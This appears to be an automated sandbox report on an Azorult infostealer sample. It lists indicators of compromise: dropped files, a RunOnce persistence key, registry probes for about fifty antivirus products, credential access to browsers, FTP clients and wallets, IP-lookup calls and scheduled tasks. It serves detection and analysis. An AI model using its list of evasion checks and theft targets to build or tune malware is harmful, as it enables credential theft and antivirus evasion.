azorult | bcea55157912f2d34bfa834371e873d42295f86292bbe7b2b61b9bc030455a13

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 21 IoCs

pid	Process
3964	setups.tmp
3964	setups.tmp
3964	setups.tmp
3964	setups.tmp
3964	setups.tmp
3964	setups.tmp
3964	setups.tmp
5372	Setup3310.tmp
5372	Setup3310.tmp
5444	vict.tmp
5432	rzd0ry3yrp5.tmp
5724	vjp2nptcneo.exe
5812	IBInstaller_97039.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/memory/5288-337-0x0000000000400000-0x0000000000EFA000-memory.dmp	themida
behavioral6/memory/4992-339-0x0000000000400000-0x0000000000F83000-memory.dmp	themida
behavioral6/memory/5700-403-0x0000000000400000-0x0000000000FE1000-memory.dmp	themida
behavioral6/memory/6876-409-0x0000000000400000-0x0000000000FD9000-memory.dmp	themida
behavioral6/memory/1724-694-0x0000000000400000-0x0000000000EFA000-memory.dmp	themida
behavioral6/memory/8260-700-0x0000000000400000-0x0000000000EFA000-memory.dmp	themida
behavioral6/memory/6400-739-0x0000000000400000-0x0000000000F83000-memory.dmp	themida
behavioral6/memory/9112-748-0x0000000000400000-0x0000000000F83000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pkoocv4o5l3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\0HG0Y4PWP8\\multitimer.exe\" 1 3.1616696297.605cd3e9a195a"	parse.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
541	checkip.amazonaws.com
249	checkip.amazonaws.com
339	ip-api.com
130	checkip.amazonaws.com
137	api.ipify.org
147	ip-api.com
236	ip-api.com
258	checkip.amazonaws.com
301	checkip.amazonaws.com
97	ipinfo.io
99	ipinfo.io
546	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2840 set thread context of 3908	2840	key.exe	87

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-O3FUI.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3DE6L.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins001.dat	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\is-092FR.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-F5OPF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RAI3U.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-C08L0.tmp	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-Q2EOH.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KUGAD.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-HLA4T.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-SV6DN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-29GC0.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-R9857.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-HU219.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-P799U.tmp	rzd0ry3yrp5.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-IKU6J.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-MI2MP.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-B5B3L.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Data.Entity.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-T4OVB.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-16BTV.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-A9JN7.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-I3NCQ.tmp	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-U6A1I.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-P30IN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9P5UF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PDQII.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-1LHA1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-L77OB.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins001.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\jxpiinstall.exe	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Globalization.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-BR0S2.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-EFMTL.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-KK74O.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-G1A24.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-0CTJ5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-VA829.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	rzd0ry3yrp5.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-73MAM.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-TGEDF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3ICAE.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	rzd0ry3yrp5.tmp
File created	C:\Program Files (x86)\viewerise\is-FEREK.tmp	rzd0ry3yrp5.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\am805.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Web.Extensions.Design.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-8BL0D.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-M2TUA.tmp	rzd0ry3yrp5.tmp
File created	C:\Program Files (x86)\viewerise\is-324MC.tmp	rzd0ry3yrp5.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-D17V6.tmp	IBInstaller_97039.tmp

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	Services.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	Services.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
5560	416	WerFault.exe	132
5624	5260	WerFault.exe	247
5488	5776	WerFault.exe	229
6464	5060	WerFault.exe	236
7212	8756	WerFault.exe	370

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
8284	schtasks.exe
8964	schtasks.exe
7144	schtasks.exe
5540	schtasks.exe

Delays execution with timeout.exe 10 IoCs

evasion

pid	Process
5220	timeout.exe
6032	timeout.exe
2280	timeout.exe
2596	timeout.exe
4388	timeout.exe
4588	timeout.exe
8960	timeout.exe
3588	timeout.exe
4716	timeout.exe
7840	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	528	Go-http-client/1.1

Kills process with taskkill 14 IoCs

evasion

pid	Process
9180	taskkill.exe
4256	taskkill.exe
7040	taskkill.exe
4512	taskkill.exe
8448	taskkill.exe
4460	taskkill.exe
5184	taskkill.exe
8648	taskkill.exe
8156	taskkill.exe
2616	taskkill.exe
1000	taskkill.exe
7716	taskkill.exe
7064	taskkill.exe
8136	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000fde523fccd20c946476ce5faa6955c45d5f5c28851419c10d21a9b134e5aee48e437358416cb0e3e898d2795499ced2e4833ac8d75edfafd487c	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
